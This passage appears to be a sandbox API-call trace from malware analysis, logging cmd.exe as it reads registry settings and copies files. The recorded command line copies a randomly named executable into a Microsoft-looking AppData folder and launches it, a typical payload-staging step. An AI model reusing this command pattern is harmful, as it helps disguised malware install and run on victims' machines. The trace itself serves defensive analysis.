RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x0, lpData=0x30e6e0*=0xa8, lpcbData=0x30e6d8*=0x1000) returned 0x2 [0098.491] 
RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x4, lpData=0x30e6e0*=0x1, lpcbData=0x30e6d8*=0x4) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x0, lpData=0x30e6e0*=0x1, lpcbData=0x30e6d8*=0x1000) returned 0x2 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x4, lpData=0x30e6e0*=0x0, lpcbData=0x30e6d8*=0x4) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x4, lpData=0x30e6e0*=0x40, lpcbData=0x30e6d8*=0x4) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x4, lpData=0x30e6e0*=0x40, lpcbData=0x30e6d8*=0x4) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x0, lpData=0x30e6e0*=0x40, lpcbData=0x30e6d8*=0x1000) returned 0x2 [0098.491] RegCloseKey (hKey=0x40) returned 0x0 [0098.491] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e6d4 | out: phkResult=0x30e6d4*=0x40) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x0, lpData=0x30e6e0*=0x40, lpcbData=0x30e6d8*=0x1000) returned 0x2 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", 
lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x4, lpData=0x30e6e0*=0x1, lpcbData=0x30e6d8*=0x4) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x0, lpData=0x30e6e0*=0x1, lpcbData=0x30e6d8*=0x1000) returned 0x2 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x4, lpData=0x30e6e0*=0x0, lpcbData=0x30e6d8*=0x4) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x4, lpData=0x30e6e0*=0x9, lpcbData=0x30e6d8*=0x4) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x4, lpData=0x30e6e0*=0x9, lpcbData=0x30e6d8*=0x4) returned 0x0 [0098.491] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e6dc, lpData=0x30e6e0, lpcbData=0x30e6d8*=0x1000 | out: lpType=0x30e6dc*=0x0, lpData=0x30e6e0*=0x9, lpcbData=0x30e6d8*=0x1000) returned 0x2 [0098.492] RegCloseKey (hKey=0x40) returned 0x0 [0098.492] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88634b [0098.492] srand (_Seed=0x5b88634b) [0098.492] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0098.492] GetCommandLineW () 
returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0098.492] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0098.492] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4d1b58, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0098.493] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0098.493] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.493] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0098.493] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0098.493] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0098.493] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0098.493] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0098.493] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0098.493] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0098.493] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0098.493] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0098.493] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0098.493] GetEnvironmentStringsW () returned 0x4d2548* [0098.493] 
FreeEnvironmentStringsW (penv=0x4d2548) returned 1 [0098.493] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.493] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0098.493] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0098.493] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0098.493] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0098.493] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0098.494] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0098.494] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0098.494] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0098.494] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0098.494] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f4a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0098.494] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f4a0, lpFilePart=0x30f49c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f49c*="Desktop") returned 0x18 [0098.494] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0098.494] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f21c | out: lpFindFileData=0x30f21c) returned 0x4d0bd8 [0098.494] FindClose (in: hFindFile=0x4d0bd8 | out: hFindFile=0x4d0bd8) returned 1 [0098.494] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f21c | out: lpFindFileData=0x30f21c) returned 0x4d0bd8 [0098.494] FindClose (in: hFindFile=0x4d0bd8 | out: hFindFile=0x4d0bd8) returned 1 [0098.494] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f21c | out: lpFindFileData=0x30f21c) returned 0x4d0bd8 [0098.495] FindClose (in: 
hFindFile=0x4d0bd8 | out: hFindFile=0x4d0bd8) returned 1 [0098.495] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0098.495] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0098.495] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0098.495] GetEnvironmentStringsW () returned 0x4d03f8* [0098.495] FreeEnvironmentStringsW (penv=0x4d03f8) returned 1 [0098.495] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0098.496] GetConsoleOutputCP () returned 0x1b5 [0098.496] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0098.496] GetUserDefaultLCID () returned 0x409 [0098.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0098.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f5e0, cchData=128 | out: lpLCData="0") returned 2 [0098.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f5e0, cchData=128 | out: lpLCData="0") returned 2 [0098.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f5e0, cchData=128 | out: lpLCData="1") returned 2 [0098.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 [0098.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0098.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0098.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") returned 4 [0098.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0098.497] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0098.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0098.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0098.497] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0098.497] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 [0098.497] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0098.498] GetConsoleTitleW (in: lpConsoleTitle=0x4c0a58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.498] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0098.498] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0098.498] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0098.498] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0098.499] _wcsicmp (_String1="type", _String2=")") returned 75 [0098.499] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0098.499] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0098.499] _wcsicmp (_String1="IF", _String2="type") returned -11 [0098.499] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0098.499] _wcsicmp (_String1="REM", _String2="type") returned -2 [0098.499] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0098.503] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\"") returned 68 [0098.503] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\"") returned 68 [0098.503] _wcsicmp (_String1="IF", 
_String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\"") returned 71 [0098.503] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\"") returned 71 [0098.503] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\"") returned 80 [0098.503] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\"") returned 80 [0098.506] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.506] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.506] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.506] GetFileType (hFile=0x7) returned 0x2 [0098.607] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.607] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f474 | out: lpMode=0x30f474) returned 1 [0098.607] _dup (_FileHandle=1) returned 3 [0098.608] _close (_FileHandle=1) returned 0 [0098.608] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe", _String2="con") returned -53 [0098.608] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x30f444, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0098.608] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0098.608] GetConsoleTitleW (in: lpConsoleTitle=0x30f274, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.609] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0098.609] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0098.609] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0098.609] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0098.609] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 
[0098.609] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x30edd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30edd8) returned 0x4d20b8 [0098.610] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0098.610] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0098.610] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0098.610] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x30dce4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0098.610] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0098.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.610] GetFileType (hFile=0x54) returned 0x1 [0098.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.610] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x30dd3c | out: lpFileSizeHigh=0x30dd3c*=0x0) returned 0x7d600 [0098.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.610] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.610] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.611] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.611] GetFileType (hFile=0x4c) returned 0x1 [0098.611] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.611] GetFileType (hFile=0x4c) returned 0x1 [0098.611] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0098.611] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.612] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.612] GetFileType (hFile=0x4c) returned 0x1 [0098.612] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.612] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.612] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.612] GetFileType (hFile=0x4c) returned 0x1 [0098.612] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.612] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.612] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.612] GetFileType (hFile=0x4c) returned 0x1 [0098.612] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] GetFileType (hFile=0x4c) returned 0x1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] GetFileType (hFile=0x4c) returned 0x1 [0098.613] _get_osfhandle (_FileHandle=1) returned 
0x4c [0098.613] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] GetFileType (hFile=0x4c) returned 0x1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.613] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.613] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.613] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.613] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] GetFileType (hFile=0x4c) returned 0x1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] GetFileType (hFile=0x4c) returned 0x1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] GetFileType (hFile=0x4c) returned 0x1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) 
returned 1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] GetFileType (hFile=0x4c) returned 0x1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] GetFileType (hFile=0x4c) returned 0x1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] GetFileType (hFile=0x4c) returned 0x1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] GetFileType (hFile=0x4c) returned 0x1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] GetFileType (hFile=0x4c) returned 0x1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.614] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0098.614] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.614] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.614] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] GetFileType (hFile=0x4c) returned 0x1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] GetFileType (hFile=0x4c) returned 0x1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] GetFileType (hFile=0x4c) returned 0x1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] GetFileType (hFile=0x4c) returned 0x1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] GetFileType (hFile=0x4c) returned 0x1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, 
